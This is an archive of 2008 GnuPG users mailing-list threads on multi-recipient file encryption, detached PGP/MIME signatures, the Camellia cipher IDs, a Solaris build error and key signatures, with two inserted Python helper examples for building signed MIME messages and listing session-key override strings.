From: aongenae at gmail.com (Arnaud Ongenae) Date: Thu, 12 Jun 2008 09:41:12 +0200 Subject: Encrypting files for many users.. In-Reply-To: References: Message-ID: <83713a650806120041j436f95a4pfa5704930cd45ad5@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 OpenPGP is a protocol essentially oriented to the exchange of information. But can also be used to protect file on your own computer. You can encrypt one file for many users, it is usually the case when you encrypt one message: example: Alice wants to send a message 'm' to Bob Alice encrypts her message 'm' with both her key and Bob's key E_{a, b}(m) By doing this Alice can read her own message later. Bob will decrypt it with his private key D_b(E{a, b} So to come back to your problem, do you want to exchange data ? if so, you can encrypt this data to all the person you want with their public key... And when an user is added or removed, you simply encrypt the new message with or without his public key... But if you plan to share some space with encrypted files, and you want people to be added or removed to this sharing, you must re-encrypt the files with all the current keys which I think is a bit annoying if you have a lot of persons who can access the sharing and a lot of files... Another important point is that each accessing person must have a public/private key... Your big problem is 'remove' people, cannot those people access data they were allowed in the past and only be restricted to the new files ? it could considerably simplify things !
_-Arnaud-_ On Wed, Jun 11, 2008 at 7:13 PM, Sartoros Dionysios wrote: > > > Hey, > > Question for you guys, new gnupg user here, great software.. > > I was thinking of maybe encrypting files in PGP that many people will > require access to, since i dont know PGP inside and out I was wondering > what would be the best method, as sometimes I will have to remove access > for some users and add new users > > I dont know subkeys or how pgp works with files too well.. Can i > add/remove users' keys to encrypted files.. If i have 100 or even 1000 > files, would I have to do it one by one (to add a new user or remove > access to one).. > > Thanks > Dennis > From wk at gnupg.org Thu Jun 12 09:48:50 2008
From: wk at gnupg.org (Werner Koch) Date: Thu, 12 Jun 2008 09:48:50 +0200 Subject: Signing in RFC3156 PGP/MIME format In-Reply-To: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com> (Deron Meranda's message of "Wed, 11 Jun 2008 15:46:51 -0400") References: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com> Message-ID: <877icvnlel.fsf@wheatstone.g10code.de> On Wed, 11 Jun 2008 21:46, deron.meranda at gmail.com said:

> gpg2 --rfc4880 --armor --sign testdoc.part

Use

  gpg2 --rfc4880 --armor --detach-sign testdoc.part

That is because PGP/MIME as well as S/MIME use detached signatures. It allows to read the content without a need for a tool to extract/verify the content from an OpenPGP signature message. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From laurent.jumet at skynet.be Thu Jun 12 11:01:24 2008 From: laurent.jumet at skynet.be (Laurent Jumet) Date: Thu, 12 Jun 2008 11:01:24 +0200 Subject: CAMELLIA Message-ID: Hello ! Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? -- Laurent Jumet KeyID: 0xCFAF704C From wk at gnupg.org Thu Jun 12 12:11:55 2008 From: wk at gnupg.org (Werner Koch) Date: Thu, 12 Jun 2008 12:11:55 +0200 Subject: CAMELLIA In-Reply-To: (Laurent Jumet's message of "Thu, 12 Jun 2008 11:01:24 +0200") References: Message-ID: <874p7zm07o.fsf@wheatstone.g10code.de> On Thu, 12 Jun 2008 11:01, laurent.jumet at skynet.be said: > Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? Camellia is not yet defined by OpenPGP and thus you can't use it. There is a testing only option to enable it. However using it now would create incompatible message because the used OpenPGP algorithm ID for Camellia is preliminary and may change in the future. In fact it already changed in the past and it may change again. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From jmoore3rd at bellsouth.net Thu Jun 12 13:42:19 2008
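Werner Koch's answer to the RFC 3156 question (sign the already-prepared first part with `--detach-sign`) slots into a multipart/signed message as sketched here. This is an added example, not code from the thread or from GnuPG; the function names, the sample part, the placeholder signature and the `micalg` value are assumptions, and `detached_signature()` needs a local gpg2 with a secret key.

```python
import email
import re
import subprocess
import uuid

CRLF = b"\r\n"

# Constructed sample of a first MIME part, headers included, with bare LFs.
SAMPLE_PART = (b"Content-Type: text/plain; charset=us-ascii\n"
               b"Content-Transfer-Encoding: 7bit\n"
               b"\n"
               b"hello\nworld\n")

# Constructed placeholder, NOT a real signature; stands in for gpg output.
PLACEHOLDER_SIG = (b"-----BEGIN PGP SIGNATURE-----\n\n"
                   b"CONSTRUCTED-PLACEHOLDER\n"
                   b"-----END PGP SIGNATURE-----\n")


def canonicalize(part):
    """Convert every line ending to CRLF; these are the bytes that get signed."""
    return re.sub(rb"\r\n|\r|\n", CRLF, part)


def detached_signature(signed_bytes, gpg="gpg2"):
    """Run the command from the reply on stdin and return the armored block."""
    result = subprocess.run([gpg, "--rfc4880", "--armor", "--detach-sign"],
                            input=signed_bytes, stdout=subprocess.PIPE,
                            check=True)
    return result.stdout


def build_multipart_signed(part, armored_sig, micalg, boundary=None):
    """Wrap the signed part and its detached signature in multipart/signed.

    micalg must name the hash the signature used (for example pgp-sha1).
    """
    signed = canonicalize(part)
    boundary = boundary or "sig-" + uuid.uuid4().hex
    delim = b"--" + boundary.encode("ascii")
    if delim in signed or delim in armored_sig:
        raise ValueError("boundary occurs in the content, choose another")
    content_type = ('Content-Type: multipart/signed; micalg=%s; '
                    'protocol="application/pgp-signature"; boundary="%s"'
                    % (micalg, boundary)).encode("ascii")
    return CRLF.join([
        b"MIME-Version: 1.0",
        content_type,
        b"",
        delim,
        signed,     # the CRLF after this belongs to the delimiter line
        delim,
        b"Content-Type: application/pgp-signature",
        b"",
        canonicalize(armored_sig.strip()),
        delim + b"--",
        b"",
    ])


def signed_part(message):
    """Return the exact bytes a verifier has to check the signature against."""
    parsed = email.message_from_bytes(message)
    if parsed.get_content_type() != "multipart/signed":
        raise ValueError("not a multipart/signed message")
    delim = b"--" + parsed.get_boundary().encode("ascii")
    start = message.index(delim + CRLF) + len(delim) + len(CRLF)
    end = message.index(CRLF + delim + CRLF, start)
    return message[start:end]


def describe(message):
    """Summarise the MIME structure as (type, protocol, micalg, part types)."""
    parsed = email.message_from_bytes(message)
    parts = [p.get_content_type() for p in parsed.get_payload()]
    return (parsed.get_content_type(), parsed.get_param("protocol"),
            parsed.get_param("micalg"), parts)


if __name__ == "__main__":
    # With a key available, replace PLACEHOLDER_SIG by
    # detached_signature(canonicalize(SAMPLE_PART)).
    print(build_multipart_signed(SAMPLE_PART, PLACEHOLDER_SIG,
                                 "pgp-sha1").decode("ascii"))
```

`signed_part()` returns exactly the bytes that were handed to gpg, which is what has to survive transport unchanged for the detached signature to verify.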
From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Thu, 12 Jun 2008 07:42:19 -0400 Subject: CAMELLIA In-Reply-To: References: Message-ID: <48510B9B.7040803@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Laurent Jumet wrote: > Hello ! > > Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? "Implemented" = Yes; in that it is present but Camellia is *not* Enabled by default. In order to Enable Camellia You will need to Build GnuPG with the --enable-camellia Flag in place. Before You rush to do this however I think You should re-read the Cautionary Message from David Shaw regarding the advisability of this: **************************************************************************** Some people have noticed that I recently committed support for the Camellia cipher in GnuPG. Here's the story behind that. Camellia is not currently part of OpenPGP, and will also not be part of the upcoming "2440bis" updating of RFC-2440. It has been proposed, however, that right after 2440bis is published, the OpenPGP Working Group take the necessary steps to add Camellia. To simplify interoperability testing between different OpenPGP implementations, I've added Camellia to GnuPG. Naturally, it is disabled by default and the only people who should really enable it are those doing interoperability work. While it is impossible for me to stop people from enabling and using it, be warned of a few things: first, Camellia isn't part of OpenPGP yet, and if for whatever reason it doesn't become part of OpenPGP, you won't be able to decrypt anything you've encrypted with Camellia. Similarly, as Camellia has not been assigned an OpenPGP cipher number, I've picked 11 (the next unassigned number). If Camellia gets approved with a different number, you won't be able to decrypt anything you've encrypted with this version of Camellia. 
Finally, if there is some error in the current GnuPG usage of Camellia that we later fix, you again won't be able to decrypt. I'm not going to go into whether Camellia is considered strong or not, as it's not really relevant to this discussion: even if Camellia was the strongest cipher in the world, you should still not enable it for the reasons given above. Rest assured that if/when Camellia is approved (or even on a reasonable track to approval), it will be enabled for general use. David ****************************************************************************** I "re-printed" this here to refresh the memories of folks who may have missed/forgotten David's original comments on Camellia. 33 JOHN ;) Timestamp: Thursday 12 Jun 2008, 07:41 --400 (Eastern Daylight Time) From jmoore3rd at bellsouth.net Thu Jun 12 14:03:32 2008
From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Thu, 12 Jun 2008 08:03:32 -0400 Subject: [patch] remove unused variable In-Reply-To: <200806121223.18606.petr.uzel@suse.cz> References: <200806111351.54449.petr.uzel@suse.cz> <87skvkotd9.fsf@wheatstone.g10code.de> <200806121223.18606.petr.uzel@suse.cz> Message-ID: <48511094.20906@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Petr Uzel wrote: > On Wednesday 11 of June 2008 17:59:14 Werner Koch wrote: >> Please do not post longer patches or series of patches unless you have >> signed a copyright assignment with the FSF. > > OK, sorry, I had no idea that this is required. I did some googling but I was > not able to find clear instructions how to sign such agreement - can I ask > you for more info how to do this? Being good friends with the Legal Affairs Officer for FSFEurope I happen to have the Links You desire handy: http://www.gnu.org/prep/maintain/html_node/Copyright-Papers.html http://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=tree;f=doc/Copyright;h=c4ef7f86c8f2b745669e3b36086e8d82421ec17f;hb=HEAD HTH JOHN ;) Timestamp: Thursday 12 Jun 2008, 08:02 --400 (Eastern Daylight Time) From vedaal at hush.com Thu Jun 12 16:39:22 2008
From: vedaal at hush.com (vedaal at hush.com)
Date: Thu, 12 Jun 2008 10:39:22 -0400
Subject: Camellia
Message-ID: <20080612143926.1F21B118040@mailserver5.hushmail.com>

>Message: 9
>Date: Thu, 12 Jun 2008 07:42:19 -0400
>From: "John W. Moore III"
>Subject: Re: CAMELLIA
>as Camellia has not been assigned an OpenPGP cipher
>number,
>I've picked 11 (the next unassigned number). If Camellia gets
>approved with a different number, you won't be able to decrypt
>anything you've encrypted with this version of Camellia.

how hard would it be to write a patch for an option of
--try-all-symmetrics
or
--use-symmetric-name
that would ignore the cipher number and try all of them,
or try only the one specified ?

( disclaimer:
*not* a feature request for the gnupg team :-)

only a workaround thought
for the hackers who choose to enable Camellia now )

vedaal

any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link

From ivan.peev at gmail.com Tue Jun 10 05:46:28 2008
From: ivan.peev at gmail.com (Ivan Peev)
Date: Mon, 9 Jun 2008 23:46:28 -0400
Subject: Remove public key from secret key
Message-ID:

Hello Guys,

Is there a way to export the secret key without the public key or remove the public key from exported secret key? I'm trying the following scenario:

1. Encrypt data with particular public key on one machine.
2. Decrypt data with related secret key on another machine.

Basically I don't want someone to be able to generate data, which can be decrypted with the related secret key.

Thank you for your time.

Regards,
Ivan

From Dionysios.Sartoros at SPCUM.QC.CA Tue Jun 10 20:37:53 2008
From: Dionysios.Sartoros at SPCUM.QC.CA (Sartoros Dionysios)
Date: Tue, 10 Jun 2008 14:37:53 -0400
Subject: Encrypting files for many users..
Message-ID:

Hey,

Question for you guys, new gnupg user here, great software..

I was thinking of maybe encrypting files in PGP that many people will require access to, since I don't know PGP inside and out I was wondering what would be the best method, as sometimes I will have to remove access for some users and add new users

I don't know subkeys or how pgp works with files too well.. Can I add/remove users' keys to encrypted files.. If I have 100 or even 1000 files, would I have to do it one by one (to add a new user or remove access to one)..

Thanks
Dennis

From slashdog at gmail.com Wed Jun 11 05:24:42 2008
From: slashdog at gmail.com (stet)
Date: Tue, 10 Jun 2008 20:24:42 -0700 (PDT)
Subject: different exported and uploaded public key
Message-ID: <17769233.post@talk.nabble.com>

I just created a new primary key and subkeys, and uploaded them to keyservers. Then I exported my public key in ascii-armor, and copied that file to a web forum profile. I noticed that the very last few characters were different from what the keyservers said. How does that happen?

Any help would be appreciated.

At the top of this link is my uploaded public key:
http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index

It is also different at pgp.mit.edu, and at http://sks-keyservers.net/status/

Below is my public key as exported to an ascii file:

--
View this message in context: http://www.nabble.com/different-exported-and-uploaded-public-key-tp17769233p17769233.html
Sent from the GnuPG - User mailing list archive at Nabble.com.

From kush.asthana at gmail.com Thu Jun 12 00:08:37 2008
From: kush.asthana at gmail.com (Kush Asthana)
Date: Wed, 11 Jun 2008 16:08:37 -0600
Subject: GNUPG 1.4.9 intallation fails on Solaris SunOS 5.10
Message-ID: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com>

Hi

I am trying to install GNUPG 1.4.9 on solaris 5.10 with following versions

sparc-sun-solaris2.10
gcc v 3.4.3
ld: Software Generation Utilities - Solaris Link Editors: 5.10-1.482

Following error is encountered every time I do make
======================================================
gmake all-recursive
gmake[1]: Entering directory `/home/user/GNUPG/gnupg-1.4.9'
Making all in m4
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/m4'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/m4'
Making all in intl
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/intl'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/intl'
Making all in zlib
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/zlib'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/zlib'
Making all in util
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/util'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/util'
Making all in mpi
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/mpi'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/mpi'
Making all in cipher
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/cipher'
gmake[2]: Nothing to be done for `all'.
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/cipher'
Making all in tools
gmake[2]: Entering directory `/home/user/GNUPG/gnupg-1.4.9/tools'
gcc -g -O2 -Wall -o mpicalc mpicalc.o ../cipher/libcipher.a ../mpi/libmpi.a ../util/libutil.a ../intl/libintl.a
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57a9e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57aa2 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb57aa6 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c66 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c6a is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb57c6e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb57cb6 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d12 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d16 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb57d1a is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb68b67 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb68ebd is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb68f2b is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb68f8f is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-add1.o): symbol : offset 0xfeb7b3fe is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-lshift.o): symbol : offset 0xfeb7b43e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(mpih-rshift.o): symbol : offset 0xfeb7b45e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file ../mpi/libmpi.a(udiv.o): symbol : offset 0xfeb7b47e is non-aligned
collect2: ld returned 1 exit status
gmake[2]: *** [mpicalc] Error 1
gmake[2]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9/tools'
gmake[1]: *** [all-recursive] Error 1
gmake[1]: Leaving directory `/home/user/GNUPG/gnupg-1.4.9'
gmake: *** [all] Error 2

Kush
================================================================
Please help!!

From rick at rickv.com Thu Jun 12 18:17:50 2008
From: rick at rickv.com (Rick Valenzuela)
Date: Thu, 12 Jun 2008 12:17:50 -0400
Subject: different exported and uploaded public key
In-Reply-To: <17769233.post@talk.nabble.com>
References: <17769233.post@talk.nabble.com>
Message-ID: <48514C2E.8020300@rickv.com>

Gnupg-users --

I apologize for the double posting of this question. I originally sent it using Nabble, but while waiting for post approval I deleted and canceled them. Then I signed up for the list and posted them directly. I assume that one more question of mine will be double-posted, too. Sorry.

Rick

--
Rick Valenzuela
photographer | reporter
+1 267 694 3642 | www.rickv.com

stet wrote:
> I just created a new primary key and subkeys, and uploaded them to
> keyservers. Then I exported my public key in ascii-armor, and copied that
> file to a web forum profile. I noticed that the very last few characters
> were different from what the keyservers said. How does that happen?
>
> Any help would be appreciated.
>
> At the top of this link is my uploaded public key:
> http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index
>
> It is also different at pgp.mit.edu, and at
> http://sks-keyservers.net/status/
>
> Below is my public key as exported to an ascii file:
>

From chd at chud.net Thu Jun 12 18:39:05 2008
From: chd at chud.net (Chris De Young)
Date: Thu, 12 Jun 2008 09:39:05 -0700
Subject: Encrypting files for many users..
In-Reply-To:
References:
Message-ID: <48515129.2050805@chud.net>

Sartoros Dionysios wrote:
> Hey,
>
> Question for you guys, new gnupg user here, great software..
>
> I was thinking of maybe encrypting files in PGP that many people will
> require access to, since I don't know PGP inside and out I was wondering
> what would be the best method, as sometimes I will have to remove access
> for some users and add new users
>
> I don't know subkeys or how pgp works with files too well.. Can I
> add/remove users' keys to encrypted files.. If I have 100 or even 1000
> files, would I have to do it one by one (to add a new user or remove
> access to one)..

Hrm... PGP/GPG may not be the best tool here. I think you will either have a key distribution problem, or a lot of work to do encrypting and re-encrypting your 1000 files every time someone leaves or arrives.

You could encrypt all the 1000 files to a single key, and distribute that key to all your clients. When a new client arrives, you just have to give her the key. When a client leaves and you want to revoke access, you have to re-encrypt all your files to a new key and then distribute that key to all your clients.

Or, you could collect the public keys for all your clients, and encrypt all your files to all those keys. If a client leaves, you have to re-encrypt everything to omit the key of the person who left. If a new client arrives, you *also* have to re-encrypt everything to add their public key to the list. But, you don't have the (potential) problem with distributing keys that you would in the first case.

There are surely other approaches as well, this is just what comes to my mind. It's not elegant.

Cheers,
-C

From jmoore3rd at bellsouth.net Thu Jun 12 19:38:16 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Thu, 12 Jun 2008 13:38:16 -0400
Subject: Camellia
In-Reply-To: <20080612143926.1F21B118040@mailserver5.hushmail.com>
References: <20080612143926.1F21B118040@mailserver5.hushmail.com>
Message-ID: <48515F08.2010801@bellsouth.net>

vedaal at hush.com wrote:
> how hard would it be to write a patch for an option of
> --try-all-symmetrics
> or
> --use-symmetric-name
> that would ignore the cipher number and try all of them,
> or try only the one specified ?
>
> ( disclaimer:
> *not* a feature request for the gnupg team :-)
>
> only a workaround thought
> for the hackers who choose to enable Camellia now )

FWIW, vedaal, Camellia 128, 192 & 256 have been incorporated into the GnuPG Source already. They have been assigned the placeholders S11, S12 & S13 respectively. There are already 'hackers' [risk takers?] who have built GnuPG with these algorithms enabled. [Werner, David & Marcus collectively shudder]

Until such time as these Algorithms are included in the 'preferences' on One's Key and that Key is disseminated there is no real 'danger'; however, once the Key is in circulation with those preferences listed on it then should the placeholder values later be changed and a Sender fails to 'refresh' Your Key from a reliable source then potential confusion could exist. :-\

I may be mis-reading Your question. Upon re-reading I am of the opinion that what You desire may already be covered with use of the preferred-algo-preference string placed within gpg.conf.

Anyway, just My 2 cents and I shall wait until I am clearer on what You are suggesting.

JOHN ;)
Timestamp: Thursday 12 Jun 2008, 13:38 --400 (Eastern Daylight Time)

From vedaal at hush.com Thu Jun 12 23:52:42 2008
From: vedaal at hush.com (vedaal at hush.com)
Date: Thu, 12 Jun 2008 17:52:42 -0400
Subject: Camellia
Message-ID: <20080612215244.1E3F92003D@mailserver7.hushmail.com>

John W. Moore III jmoore3rd at bellsouth.net wrote on Thu Jun 12 19:38:16 CEST 2008 :

>I may be mis-reading Your question.

yes, suggestion only, for a workaround,

>Upon re-reading I am of the opinion
>that what You desire may already be covered with use of the
>preferred-algo-preference string placed within gpg.conf.

no, that allows the user to choose which cipher to use for encryption to begin with

my suggestion is *after* Camellia is enabled in a hacked version and unable to be decrypted in the hacked version when the message was encrypted using Camellia in a later version

the problem with changing the name of the cipher in a later (open-pgp approved version) is that when the session key is retrieved from the public key encrypted packet, it needs to know what cipher it is to be plugged into to decrypt

for the sake of illustration, let's say that a newer version that may be calling Camellia with the identifier of 13, the older version, which thinks that Camellia is 11, and is using 13 for yet another cipher, will not be able to decrypt the message from the newer version that used the identifier 13, because it is trying to use the session key with the wrong cipher

my workaround suggestion, was similar to the solution for decryption of messages done with the throw-keyid option

Disastry's last version of pgp 2.3i-multi-6, had two variations of the throw-keyid option: random keyid, and fake keyid

in both variations, the keyid listed as part of the pgp message, was NOT the public key that the session key was encrypted to

the gnupg option used to decrypt such messages, was --try-all-secrets

similarly, as a workaround suggestion, if decryption doesn't work because the correct session key has the wrong cipher identifier, it could still be decrypted by making an option of --try-all-ciphers

(easier, because the passphrase doesn't have to be re-entered for each key ;-) )

again, NOT a feature request for the gnupg development team :-)

(am quite happy to wait for the 'official' version, whenever that may be)

sorry if i didn't write it clearly in my earlier post

vedaal

any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link

From classpath at arcor.de Fri Jun 13 01:04:49 2008
From: classpath at arcor.de (Morton D. Trace)
Date: Fri, 13 Jun 2008 01:04:49 +0200
Subject: GNUPG 1.4.9 intallation fails on Solaris SunOS 5.10
In-Reply-To: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com>
References: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com>
Message-ID: <4851AB91.70500@arcor.de>

Kush Asthana wrote:
> Hi
>
> I am trying to install GNUPG 1.4.9 on solaris 5.10 with following versions
>
> sparc-sun-solaris2.10
> gcc v 3.4.3
> ld: Software Generation Utilities - Solaris Link Editors: 5.10-1.482
>
> Following error is encountered every time I do make

before you run make you do a configure,

./configure AR=gar

That did the trick, gar under solaris is gnu ar. the same should hold for m4 and all other gnu tools,

I use open solaris

bash-3.00$ uname -a
SunOS solaris-devx 5.11 snv_64a i86pc i386 i86pc

It works.

bash-3.00$ gpg --version
gpg (GnuPG) 1.4.8
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
bash-3.00$

Sincerely
Morten

From wk at gnupg.org Fri Jun 13 07:33:40 2008
From: wk at gnupg.org (Werner Koch)
Date: Fri, 13 Jun 2008 07:33:40 +0200
Subject: Camellia
In-Reply-To: <20080612215244.1E3F92003D@mailserver7.hushmail.com> (vedaal@hush.com's message of "Thu, 12 Jun 2008 17:52:42 -0400")
References: <20080612215244.1E3F92003D@mailserver7.hushmail.com>
Message-ID: <873anhhpaj.fsf@wheatstone.g10code.de>

On Thu, 12 Jun 2008 23:52, vedaal at hush.com said:

> pgp approved version) is that when the session key is retrieved
> from the public key encrypted packet, it needs to know what cipher
> it is to be plugged into to decrypt

Use --{show,override}-session-key:

  $ gpg --show-session-key /dev/null
  [...]
  gpg: session key: `3:0F5933BF86E0D8A3155984577BB0DD6A'

and then

  $ gpg --override-session-key 3:0F5933BF86E0D8A3155984577BB0DD6A y

The '3' is the algorithm id - just change it.

Salam-Shalom,

   Werner

--
Thoughts are free. Exceptions are regulated by a federal law.

From george.davidescu at gmail.com Fri Jun 13 17:07:12 2008
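Werner's reply above relies on the `ALGO:HEXKEY` layout of the session key string. The following Python helper is an added example (not code from the thread or from GnuPG): it pulls that string out of the gpg output line quoted above and lists the override strings worth trying, namely the other cipher IDs whose key length matches the session key. The ID table is RFC 4880's plus the Camellia placeholders 11 to 13 named in the thread; the function names and the Camellia labels are made up for this example.

```python
import re

# Key length in octets per OpenPGP symmetric cipher ID (RFC 4880, section 9.2),
# plus IDs 11-13, which this thread names as GnuPG's Camellia placeholders.
KEY_OCTETS = {1: 16, 2: 24, 3: 16, 4: 16, 7: 16, 8: 24, 9: 32, 10: 32,
              11: 16, 12: 24, 13: 32}
NAMES = {1: "IDEA", 2: "3DES", 3: "CAST5", 4: "BLOWFISH", 7: "AES",
         8: "AES192", 9: "AES256", 10: "TWOFISH",
         11: "CAMELLIA128", 12: "CAMELLIA192", 13: "CAMELLIA256"}  # 11-13: labels only

GPG_LINE = re.compile(r"session key: \W?(\d+:[0-9A-Fa-f]+)")


def extract_session_key(gpg_output):
    """Pull the ALGO:HEXKEY string out of `gpg --show-session-key` output."""
    match = GPG_LINE.search(gpg_output)
    if not match:
        raise ValueError("no session key line found")
    return match.group(1)


def parse_session_key(text):
    """Split ALGO:HEXKEY into (algorithm id, key bytes), validating both parts."""
    algo, sep, hexkey = text.strip().partition(":")
    if not sep or not algo.isdigit():
        raise ValueError("expected ALGO:HEXKEY")
    return int(algo), bytes.fromhex(hexkey)   # fromhex rejects odd or non-hex input


def override_candidates(text):
    """Return [(override string, cipher name)] for every other cipher ID whose
    key length equals the session key's; a cipher with a different key length
    cannot use this key at all."""
    algo, key = parse_session_key(text)
    hexkey = key.hex().upper()
    return [("%d:%s" % (cid, hexkey), NAMES[cid])
            for cid in sorted(KEY_OCTETS)
            if cid != algo and KEY_OCTETS[cid] == len(key)]


if __name__ == "__main__":
    # Output line as quoted in Werner's message.
    line = "gpg: session key: `3:0F5933BF86E0D8A3155984577BB0DD6A'"
    for candidate, name in override_candidates(extract_session_key(line)):
        print("gpg --override-session-key %s   # try as %s" % (candidate, name))
```
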
From: george.davidescu at gmail.com (bezna)
Date: Fri, 13 Jun 2008 08:07:12 -0700 (PDT)
Subject: Signatures stored as information inside a "public key"/certificate?
Message-ID: <17825579.post@talk.nabble.com>

Hello,

I'm having a disagreement with someone over this. From what I've read, signatures on a "public key" or rather, a certificate, including the self-signature, are stored as a packet on that key. The important point: This data (IE all the signatures made on your certificate) is encoded on the certificate within that block of ASCII armoured text/binary data when it is exported for someone else to import in their keyring.

Now I'm being told that signatures are not part of the certificate itself, but rather as data on the keyring, and that the "export" command in fact exports this additional data from your keyring and somehow attaches it to the public key to produce the ASCII armoured output or whatever. Similarly, I'm being told that when you upload your keys to a keyserver, what is in fact uploaded is your "keyring" and that this is where the signature data comes from.

To me the latter view is false. I see the list of signatures as being a component of the certificates stored within the certificate, not somewhere else. When keys are uploaded to a server, you can filter out which keys you want uploaded; the notion of a "public keyring" to me is simply a set of public keys (certificates), with no extra data attached, or at least not the signatures. While it is possible to export multiple certificates at once in one block of text, this text contains just those certificates, not some "keyring" or meta-entity; the certificates then contain their respective signature data.

Which is correct? Are signatures an inherent part of the key or are they stored extrinsically?

George

--
View this message in context: http://www.nabble.com/Signatures-stored-as-information-inside-a-%22public-key%22-certificate--tp17825579p17825579.html
Sent from the GnuPG - User mailing list archive at Nabble.com.

From classpath at arcor.de Fri Jun 13 17:35:36 2008
From: classpath at arcor.de (Morton D. Trace) Date: Fri, 13 Jun 2008 17:35:36 +0200 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> References: <17825579.post@talk.nabble.com> Message-ID: <485293C8.2030000@arcor.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 bezna wrote: > Hello, > > Which is correct? Are signatures an inherent part of the key or are they > stored extrinsically? > > > George i would put it this way, when I run gpg in command line mode I create a user ID and a secret key + a public key. that is assigned my real name and armored, Then I meet up at the keysigning party and they all verify it, later I think i can append other email addresses to the same private key, I don't know if i can assign a fake private name like Lordbyte Whirlfield or Dick Tracey or whatever, as long as you don't take the identity from someone else, your digital name can be whatever. but for privacy and spam and prevention of identity theft I hope that can be possible. Some people prefer not to put that on a keyserver, simply for preventing spam, and fraud. But I am only familiar to gnuPG, what is the case for a root certificate or exactly how that can be revoked I don't know. http://www.gnupg.org/gph/en/manual.html http://www.gnupg.org/gph/en/manual.html#CONCEPTS signatures are an inherent part of a key, but you can anytime create new keypairs, for any key you can assign a new artificial name. This is only my limited understanding of this, please correct me if I'm wrong. Morten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (SunOS) Comment: Using GnuPG with Mozilla - 